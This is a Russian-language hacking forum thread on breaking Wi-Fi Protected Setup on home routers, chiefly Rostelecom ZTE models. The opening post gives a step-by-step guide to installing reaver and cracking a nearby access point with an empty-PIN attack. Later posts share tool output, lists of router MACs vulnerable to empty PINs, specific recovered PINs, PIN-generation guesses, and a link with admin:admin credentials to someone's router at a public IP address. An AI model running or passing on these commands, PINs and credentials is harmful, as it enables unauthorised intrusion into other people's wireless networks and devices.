Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. spassk14

    spassk14 Member

    Joined:
    11 Sep 2017
    Messages:
    2
    Likes Received:
    5
    Reputations:
    0

    Сегодня попробовал, у меня все получилось)

    Гайд для владельцев ZTE H118N v2.3 (Ростелеком) (Взлом WPS):
    1.Загружаемся в Kali Linux( с флешки)
    2.Подключаемся к интернету (через Wi-Fi, или по кабелю)
    3.Запускаем терминал
    4.Устанавливаем libpcap-dev:
    А.sudo apt-get update (обновление репозитория Kali Linux)
    Б.sudo apt-get install libpcap-dev (Установка PCAP)
    5.Установка Reaver (t6x)
    А.git clone https://github.com/t6x/reaver-wps-fork-t6x
    Б.cd reaver-wps-fork-t6x*/
    cd src/
    ./configure
    make
    В.sudo make install
    5.Когда установили, перезапускаем Терминал
    6.Переводим Wi-Fi адаптер в режим монитора
    7.Вводим: airmon-ng kill (убиваем процессы при соединении по Wi-Fi)
    8.Ищем через wash -i wlan0mon (вместо wlan0mon вводите название Вашего адаптера в режиме монитора) точку, которую будете ломать
    9.Вводим команду (внимательно вводите, чтобы ошибок не было! P.S Вместо wlan0mon вводите ваш адаптер в режиме монитора, BSSID- MAC-Адрес роутера,которого взламываем)
    reaver -i wlan0mon -b bssid -vv -p "" -n
    10.Все, точка взломана)
     
    quite gray, medshai, Anton_co and 2 others like this.
  2. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    24
    Likes Received:
    10
    Reputations:
    0
    Спасибо,Мастер.Вот это мануальчик!
    Попробовал на ZXHN H108N но увы...
    Switching wlan1mon to channel 1
    [+] Waiting for beacon from 74:A7:8E:C1:******
    [+] Associated with 74:A7:8E:C1:****** (ESSID: RT-WiFi_****)
    [+] Trying pin "-n"
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Quitting after 1 crack attempts
    [-] Failed to recover WPA key
    [*] String pin was specified, nothing to save.
    Может что не так делаю? Опыта и знаний явно не хватает.
     
  3. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    24
    Likes Received:
    10
    Reputations:
    0
    А как должна выглядеть команда для пустого пина?
     
  4. CRACK211

    CRACK211 Well-Known Member

    Joined:
    16 Sep 2009
    Messages:
    899
    Likes Received:
    984
    Reputations:
    5
    -p ""
     
    quite gray and Kakoluk like this.
  5. muradddddd

    muradddddd Member

    Joined:
    19 May 2017
    Messages:
    185
    Likes Received:
    15
    Reputations:
    0
    А какие роутеры подаються
    к пустым пинам?
     
  6. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,558
    Likes Received:
    9,592
    Reputations:
    119
    [​IMG]

    Информация уже собирается на 3WiFi.
    Две двойные кавычки после -p поставили? Если да, попробуйте убрать -n в конце.
     
    Kakoluk and Payer like this.
  7. maus

    maus Member

    Joined:
    30 May 2015
    Messages:
    370
    Likes Received:
    98
    Reputations:
    0
    CA:A3:66 - ZTE ZXHN H298N -p ""
     
    binarymaster likes this.
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,558
    Likes Received:
    9,592
    Reputations:
    119
    Добавил в список, спасибо!
     
  9. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    220
    Likes Received:
    39
    Reputations:
    0
    Какой алгоритм генерации у роутеров на базе Realtek RTL8671, встречаются с масками RT-WiFi_$$ (где $$ номер квартиры);
    октеты MAC разные, мне встречались 3 разных октета, Router скан один вскрыл, PIN: 05294176, для MAC: d4:bf:7f:52:89:4c.
    Пример интерфейса этого роутера для исследования: http://admin:admin@5.228.1.29/

    WPS PIN Companion почему-то PIN ассоциирует с Static PIN - UR-825AC
     
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,558
    Likes Received:
    9,592
    Reputations:
    119
    Неудивительно, это ведь Upvel.
     
  11. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    220
    Likes Received:
    39
    Reputations:
    0
    Пробовал вбивать этот PIN с ключом -p, перебор зацикливается на 90.91%, но в лок не уходит.
    Результат разумеется не выдаёт, может какие другие параметры указать для перебора?
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,558
    Likes Received:
    9,592
    Reputations:
    119
    Пустой пин код пробовали?

    Попробуйте последней ночной сборкой Router Scan, там эта фича недавно появилась.
     
  13. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    220
    Likes Received:
    39
    Reputations:
    0
    Не пойму как его активировать, сборка RS от 14 сентября, после посылки пакета M2, выдается ошибка [-] Unknown error 000B. PIN пробовал: 00000000
     
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,558
    Likes Received:
    9,592
    Reputations:
    119
    https://forum.antichat.ru/posts/4128770
     
  15. Stefalex85

    Stefalex85 New Member

    Joined:
    4 May 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Господа, помогите в возможно лёгком вопросе. Имеется точка от tenda c8:3a:35:0c:2b:20 , согласно проге dumper пин должен быть 07974724, но увы не подходит. Через брутфорс лочится после 10 попытки подбора (
     
  16. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,558
    Likes Received:
    9,592
    Reputations:
    119
    Router Scan с атакой Pixie Dust пробовали?
     
  17. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,039
    Likes Received:
    1,792
    Reputations:
    21
    Это тенда на броадкомовском чипе, пикси не поможет.
    Пин не подходит потому, что алгоритм генерации на новых тендах подправили, теперь там не просто 24bit pin, а какой то 24bit + 1000
    С ними блоки в базе есть
    C8:3A:35:3A:AB*
    Можно поэкспериментировать.
     
    binarymaster likes this.
  18. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,558
    Likes Received:
    9,592
    Reputations:
    119
    Мы с товарищем @ms13 немного покопались, и нашли что-то вроде закономерности.

    Может у кого-то возникнут идеи по алгоритму. Пока ясно лишь одно - он нелинейный:

    [​IMG]

    Смотреть в базе 3WiFi по запросу - 40:4A:03:AE:8*, 40:4A:03:AE:9* и т.д.
     
    4Fun, Monohrom, Mednik and 4 others like this.
  19. DSL2650NRU

    DSL2650NRU Well-Known Member

    Joined:
    12 Apr 2016
    Messages:
    437
    Likes Received:
    316
    Reputations:
    1
    ZTE ZXHN H108N 74:A7:8E:C0:AB:CD от Ростелекома с именем сети RT-WiFi_ABCD уязвимы к пустому пину :) В базе 3wifi такой записи не нашел.
     
    hydra, Kakoluk, uzeerpc and 6 others like this.
  20. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,558
    Likes Received:
    9,592
    Reputations:
    119
    Добавил, спасибо! :)
     
    Kakoluk, uzeerpc, Vovan19 and 2 others like this.
Loading...